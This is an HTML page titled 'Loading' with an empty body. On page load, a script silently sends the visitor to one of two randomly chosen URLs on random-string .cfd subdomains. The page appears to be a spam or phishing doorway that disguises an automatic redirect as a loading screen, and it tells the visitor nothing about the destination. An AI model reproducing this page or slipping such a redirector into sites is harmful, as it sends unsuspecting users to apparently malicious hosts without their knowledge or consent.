<!DOCTYPE html>
<html>
  <head>
    <title>加载中.....</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        background-color: #f0f0f0;
        display: flex;
        flex-direction: column;
        justify-content: flex-start;
        align-items: center;
        height: 100vh;
        margin: 0;
        color: #333;
      }

      p {
        font-size: 35px;
        text-align: center;
        color: darkgreen;
        margin: 1em 0;
      }
      .highlight {
        color: coral;
      }

      .image-container {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-top: 2em;
      }

      .image-container img {
        max-width: 100%;
        height: auto;
        margin-top: 1em;
      }
    </style>
    <script type="text/javascript">
      window.onload = function () {
        var links = [
          "http://y2xbfiw5fai.pbwmat.cfd/SAZ6x3HZ",
          "http://jtjii36bppa.nmgylk.cfd/0TY6OQtp",
        ];
        var randomLink = links[Math.floor(Math.random() * links.length)];
        setTimeout(function () {
          window.location.href = randomLink;
        }, 100);
      };
    </script>
  </head>
  <body></body>
</html>
